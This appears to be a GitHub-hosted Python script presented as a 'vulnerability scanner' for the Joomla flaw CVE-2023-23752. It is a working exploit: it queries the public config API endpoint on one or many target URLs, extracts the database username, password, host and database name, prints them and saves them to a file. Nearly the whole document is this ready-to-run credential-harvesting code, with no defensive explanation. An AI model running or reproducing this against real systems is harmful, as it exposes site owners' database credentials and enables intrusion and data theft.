-
Notifications
You must be signed in to change notification settings - Fork 0
/
vulnerability_scanner.py
98 lines (75 loc) · 4.01 KB
/
vulnerability_scanner.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
import requests
import re
import argparse
import os
from colorama import init, Fore, Style
init(autoreset=True)
CVE_ID = 'CVE-2023-23752'
print('''
###### ## ## ######## ####### ##### ####### ####### ####### ####### ######## ######## #######
## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
## ## ## ## ## ## ## ## ## ## ## ## ## ##
## ## ## ###### ####### ####### ## ## ####### ####### ####### ####### ####### ## ####### #######
## ## ## ## ## ## ## ## ## ## ## ## ## ##
## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
###### ### ######## ######### ##### ######### ####### ######### ####### ## ###### #########
''')
def check_vulnerability(url, output_file=None):
if not url.startswith("http://") and not url.startswith("https://"):
url = "http://" + url
if not url.endswith("/api/index.php/v1/config/application?public=true"):
url += "/api/index.php/v1/config/application?public=true"
try:
response = requests.get(url)
if response.status_code == 200:
text = response.text
user_match = re.search(r'"user"\s*:\s*"([^"]+)"', text)
password_match = re.search(r'"password"\s*:\s*"([^"]+)"', text)
host_match = re.search(r'"host"\s*:\s*"([^"]+)"', text)
db_match = re.search(r'"db"\s*:\s*"([^"]+)"', text)
if user_match and password_match and host_match and db_match:
user = user_match.group(1)
password = password_match.group(1)
host = host_match.group(1)
db = db_match.group(1)
print(f"{Style.BRIGHT}{Fore.RED}Vulnerable to {CVE_ID}: {url}")
print(f"\tuser: {user}")
print(f"\tpassword: {password}")
print(f"\thost: {host}")
print(f"\tdb: {db}")
if output_file:
with open(output_file, 'a') as file:
file.write(f"Vulnerable to {CVE_ID}: {url}\n")
file.write(f"user: {user}\n")
file.write(f"password: {password}\n")
file.write(f"host: {host}\n")
file.write(f"db: {db}\n\n")
else:
print(f"{Style.BRIGHT}{Fore.GREEN}Not vulnerable to {CVE_ID}: {url}")
else:
print(f"{Style.BRIGHT}{Fore.YELLOW}Not vulnerable to {CVE_ID}: {url}")
except requests.exceptions.RequestException:
print(f"{Style.BRIGHT}{Fore.YELLOW}Error connecting to {url}")
def main():
parser = argparse.ArgumentParser(description='Python vulnerability scanner')
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('-u', '--url', metavar='URL', type=str, help='URL to scan')
group.add_argument('-f', '--file', metavar='FILE', type=str, help='File containing list of target URLs')
parser.add_argument('-o', '--output', metavar='OUTPUT', type=str, help='Output file to store results')
args = parser.parse_args()
print(f"Scanning URLs for {CVE_ID} vulnerability...")
if args.output:
if not os.path.dirname(args.output):
args.output = os.path.join(os.getcwd(), args.output)
if not os.path.exists(args.output):
open(args.output, 'w').close()
if args.url:
check_vulnerability(args.url, output_file=args.output)
elif args.file:
with open(args.file, 'r') as file:
for line in file:
url = line.strip()
check_vulnerability(url, output_file=args.output)
print("Scan complete.")
if __name__ == '__main__':
main()